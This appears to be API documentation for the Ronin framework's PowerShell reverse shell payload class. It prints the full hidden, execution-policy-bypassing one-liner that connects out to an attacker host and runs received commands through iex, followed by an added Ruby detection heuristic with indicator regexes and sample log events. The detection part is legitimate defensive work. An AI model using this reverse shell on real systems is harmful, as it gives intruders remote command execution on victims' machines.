Class: Ronin::Payloads::CMD::PowerShell::ReverseShell
- Inherits: Ronin::Payloads::CommandPayload
  - Object
  - Payload
  - Ronin::Payloads::CommandPayload
  - Ronin::Payloads::CMD::PowerShell::ReverseShell
- Includes: Mixins::ReverseShell
- Defined in: lib/ronin/payloads/builtin/cmd/powershell/reverse_shell.rb
Overview
A basic powershell reverse shell command.
Instance Attribute Summary
Attributes included from Mixins::PostEx
Attributes inherited from Payload
Instance Method Summary
- #build ⇒ Object: Builds the powershell reverse shell command.
Methods included from Mixins::ReverseShell
#host, included, #perform_cleanup, #perform_postlaunch, #perform_prelaunch, #port
Methods included from Mixins::PostEx
Methods inherited from Ronin::Payloads::CommandPayload
Methods inherited from Payload
#built?, #built_payload, #bytesize, #cleanup, #encode_payload, #encoded_payload, encoder_class, #initialize, #length, payload_type, #perform_build, #perform_cleanup, #perform_postlaunch, #perform_prelaunch, #perform_validate, #postlaunch, #prelaunch, #rebuild_payload, #reencode_payload, register, #to_s, #validate
Constructor Details
This class inherits a constructor from Ronin::Payloads::Payload
Instance Method Details
#build ⇒ Object
Builds the powershell reverse shell command.
# File 'lib/ronin/payloads/builtin/cmd/powershell/reverse_shell.rb', line 45
def build
  @payload = %{powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(#{host.dump},#{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}
end
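A defender's view of the command line that #build produces, as an added example that is not part of ronin-payloads: a Ruby heuristic that scores process-creation command lines (for example from Windows Security event 4688 or Sysmon event 1) on the launch flags and .NET calls visible above. The rule names, thresholds, host names and sample events are constructed assumptions.

```ruby
# Added example: heuristic triage of process-creation command lines for the
# traits of the one-liner shown above. Rule names and thresholds are assumptions.
INDICATORS = {
  no_profile:      /\s-nop\w*/i,                  # -NoP / -NoProfile
  non_interactive: /\s-noni\w*/i,                 # -NonI / -NonInteractive
  hidden_window:   /\s-w\w*\s+hid\w*/i,           # -W Hidden / -WindowStyle Hidden
  exec_bypass:     /\s-e(?:p|x\w*)\s+bypass\b/i,  # -ep / -Exec / -ExecutionPolicy Bypass
  tcp_client:      /System\.Net\.Sockets\.TCPClient/i,
  get_stream:      /\.GetStream\(\)/i,
  invoke_expr:     /\b(?:iex|Invoke-Expression)\b/i
}.freeze

# Names of the indicators present; empty unless the process is PowerShell.
def matched_indicators(cmdline)
  return [] unless cmdline.match?(/\b(?:powershell|pwsh)(?:\.exe)?\b/i)
  INDICATORS.select { |_name, re| cmdline.match?(re) }.keys
end

# :high   = stealth launch flags AND a raw socket fed into Invoke-Expression
# :medium = either pair alone; :none = anything else (e.g. Bypass on its own)
def verdict(cmdline)
  hits    = matched_indicators(cmdline)
  stealth = (%i[hidden_window exec_bypass] - hits).empty?
  shell   = (%i[tcp_client invoke_expr] - hits).empty?
  return :high if stealth && shell
  return :medium if stealth || shell
  :none
end

# Constructed sample events (hosts, address and port are made up).
SAMPLE_EVENTS = [
  { host: 'WS-014', cmd: 'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.0.2.10",4444);$stream = $client.GetStream(); ... (iex $data 2>&1 | Out-String ) ...' },
  { host: 'WS-027', cmd: 'powershell -w hidden -ep bypass -c "Start-Sleep 5"' },
  { host: 'WS-022', cmd: 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1' },
  { host: 'SRV-003', cmd: 'powershell.exe -Command Get-Service | Where-Object Status -eq Running' },
  { host: 'WS-031', cmd: 'cmd.exe /c ping -w 100 192.0.2.10' }
].freeze

# Keep only events that need an analyst's attention, annotated with the verdict.
def triage(events)
  events.map { |e| e.merge(verdict: verdict(e[:cmd])) }
        .reject { |e| e[:verdict] == :none }
end

triage(SAMPLE_EVENTS).each { |e| puts "#{e[:host]}: #{e[:verdict]}" } if __FILE__ == $0
```

Command-line matching only sees what is logged in clear text, so pair it with PowerShell script block logging (event 4104) to cover encoded or staged variants.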